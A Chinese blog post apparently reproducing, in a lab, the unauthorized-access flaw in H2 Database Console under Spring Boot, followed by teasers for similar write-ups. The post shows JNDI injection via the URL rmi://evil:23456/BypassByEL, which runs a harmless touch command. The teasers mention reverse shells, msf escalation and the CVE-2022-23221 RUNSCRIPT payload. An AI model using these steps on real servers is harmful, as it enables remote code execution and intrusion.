H2 Database Console未授权访问

最新推荐文章于 2025-04-14 09:09:48 发布
最新推荐文章于 2025-04-14 09:09:48 发布
阅读量1.1k 收藏 1
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zzzzz1284/article/details/128578036
版权

原因

H2 数据库是 Java 中的嵌入式内存数据库。带有 h2 数据库的 Springboot 带有一个 web 管理页面,如果您设置以下选项,则该页面没有身份验证:

spring.h2.console.enabled=true 
spring.h2.console.settings.web-allow-others=true

该管理页面支持使用JNDI加载JDBC驱动,可以通过远程类加载实现远程代码执行。

spring-boot正在监听http://your-ip:8080,默认管理页面http://your-ip:8080/h2-console/。

复现

使用此工具JNDI即可利用该漏洞。首先,将目标命令设置为touch /tmp/successat config.properties:

然后启动JNDI-1.0-all.jar,就是会听的0.0.0.0:23456。根据这些信息填写表格:

javax.naming.InitialContext是 JNDI 工厂类名,URLrmi://evil:23456/BypassByEL是你的 RMI 地址。

RMI 服务器收到请求:

touch /tmp/success已成功执行:

n1ght_X
关注
H2 Database Console未授权访问漏洞复现+利用
0xSec
04-08 2198
H2 database是一款Java内存数据库,多用于单元测试。利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。
【实战系列4】H2 Database Console未授权访问/命令执行漏洞到msf内网提权渗透
04-13 1630
通过H2Database Console的命令执行漏洞,结合windows的powershell反弹shell,再利用msf提权并开启rdp服务,在管理员修改了默认的rdp端口3389的情况下,利用命令找到真正的rdp服务端口,远程连接控制目标主机。
H2 Database Console未授权访问漏洞封堵
本博客纯属个人网络笔记,如对阁下有用,甚喜;否则,关掉即可,不喜勿喷。专心写代码,不做键盘侠!
07-05 654
H2 Database Console未授权访问,默认情况下自动创建不存在的数据库,从而导致未授权访问。网络上能搜到各种未授权访问的教程,但是它怎么封堵呢?
SpringBoot集成H2 Console管理界面
最新发布
罗小爬的技术宝书
04-14 746
这个 URL 配置了一个运行在内存中的 H2 数据库,兼容 MySQL,表名和列名自动转为小写,并且设置了数据库在连接关闭或 JVM 退出时不会自动关闭。
H2 Database Console 未授权访问
黑白的博客
12-20 4764
声明 好好学习,天天向上 漏洞描述 H2 database是一款Java内存数据库,多用于单元测试。H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权: spring.h2.console.enabled=true spring.h2.console.settings.web-allow-others=true 利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。 影响范围 Spring Boot
数据库应用-H2database--未授权访问&命令执行漏洞
XXokok的博客
11-26 935
数据库应用-H2database--未授权访问&命令执行漏洞
H2 Database Console 未授权访问复现
不想当脚本小子的脚本小子
01-27 1715
漏洞概述: H2 database是一款Java内存数据库,多用于单元测试。H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权: spring.h2.console.enabled=true spring.h2.console.settings.web-allow-others=true 利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。 环境搭建 使用vulhub来安装环境 进入h2
H2db console 未授权访问RCE 漏洞复现+利用(CVE-2022-23221)
0xSec
02-21 3622
H2 数据库控制台中的另一个未经身份验证的 RCE 漏洞,在 v2.1.210+ 中修复。2.1.210 之前的 H2 控制台允许远程攻击者通过包含 IGNORE_UNKNOWN_SETTINGS=TRUE;INIT=RUNSCRIPT 子字符串的 jdbc:h2:mem JDBC URL 执行任意代码。
H2database-未授权访问漏洞复现
weixin_45366453的博客
06-29 3635
H2 database是一款Java内存数据库,多用于单元测试。默认端口:20051H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权: 利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。执行如下命令启动一个Springboot + h2database环境:启动后,访问即可查看到H2 database的管理页面。下载JNDI-Injection-Exploithttps://github.co
H2database 未授权访问 vulhub
c0529的博客
06-12 554
打开之后是一个访问的页面,我们需要用java语言驱动让这个网站主动访问其他主机并且执行命令,我们需要用到一开始写在最前面的工具进行生成rmi。我出现的一个问题就是反弹不出去,我想了想可能是要在我的外网上面java生成命令才对,但是等我反应过来,我已经把容器关掉了。在驱动选择:javax.naming.InitialContext。被反弹shell的机子:可以就用kali,或者配一台外网服务器。出现下方红色的字体就成功了,同时你的主机检测到了这个网站的访问。虚拟机:kali+docker。
H2database未授权访问漏洞复现-CVE-2022-23221
weixin_63308767的博客
01-24 553
3、在vps(攻击机)上创建sql文件(h2database.sql)进行反弹拿shell。2指定驱动类及将生成的指令进行提交反弹shell(如果反弹不回来那就换端口,重启靶机)漏洞url地址:http://ip:端口/h2-console/漏洞url地址:http://ip:端口/h2-console/6、远程请求h2database.sql文件实现shell反弹。2、反弹代码进行base64加密(IP端口为攻击机的)1、未授权进入数据库(验证是否存在该漏洞)1、在攻击机启动反弹命令及开启nc监听。
服务攻防-数据库安全&Redis&CouchDB&H2database&未授权访问&CVE漏洞
SuperherRo的博客
01-23 1579
1、数据库-Redis-未授权RCE&CVE 2、数据库-Couchdb-未授权RCE&CVE 3、数据库-H2database-未授权RCE&CVE 章节点: 1、目标判断-端口扫描&组合判断&信息来源 2安全问题-配置不当&CVE漏洞&弱口令爆破 3、复现对象-数据库&中间件&开发框架&应用协议
Spring Boot 使用 H2 数据库的控制台(Console
HONEY MOOSE
04-05 9879
如果你希望在 Spring Boot 启用 H2 数据库的话,这篇文章适合你进行了解。 概述 在这个指南中,我们将会考虑如何在 Spring Boot 中使用 H2 数据库。 与其他数据库相似,Spring Boot 生态系统中能够完全支持 H2 数据库 依赖(Dependencies) 让我们首先需要定义 H2 数据库依赖:https://search.maven.org/searc...
服务攻防——数据库安全未授权访问、弱口令
m0_61506558的博客
12-14 704
关于判断服务是否开放进行信息收集的内容,可能通过扫描工具,如果遇到WAF的话,通过常用搭建网站的组件进行尝试,或者通过特定服务提供的报错信息进行判断......由于基于 Erlang 的 JSON 解析器和基于 JavaScript 的 JSON 解析器的差异,在 1.7.0 之前的 Apache CouchDB 和 2.1.1 之前的 2.x 中,可以提交_users具有重复键的文档,roles用于数据库内的访问控制,包括特例_admin角色,表示管理用户。
h2-console: Example Using the H2 Console with JBoss
jvisualvm
01-06 328
首先参考以下链接查看h2-console的相关说明和配置 http://www.jboss.org/jdf/quickstarts/jboss-as-quickstart/h2-console/   接着进入https://github.com/jboss-jdf/jboss-as-quickstart/tree/jdf-2.0.0.Final 或者通过git clone git://g...
h2 database console JNDI RCE复现
12-09 1778
h2 database console JNDI RCE复现
数据库安全-H2 database&Elasticsearch&CouchDB&Influxdb漏洞复现
网络空间安全学习
10-14 1186
Apache CouchDB是一个开源的面向文档的NoSQL数据库,用Erlang实现。它使用JSON来存储数据,使用MapReduce使用JavaScript作为查询语言,使用HTTP作为API。在用户开启了认证, 但未设置参数 shared-secret 的情况下,jwt 的认证密钥为空字符串,此时攻击者可 以伪造任意用户身份在 influxdb 中执行 SQL 语句。利用这个管理页面,我们可以进行 JNDI 注入攻击,进而在目标环境下执行任意命令。将生成出来的所提供的服务,输入到界面当中,进行连接。
如何在application.properties或application.yml文件中启用了H2 Console,例如添加 spring.h2.console.enabled=true
10-09
在Spring Boot应用中启用H2 Console,你需要在`application.properties`或`application.yml`文件中添加特定的配置项,用于开启H2 Database的控制台功能并设置其访问端口。以下是这两个文件中相应的配置示例: **...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值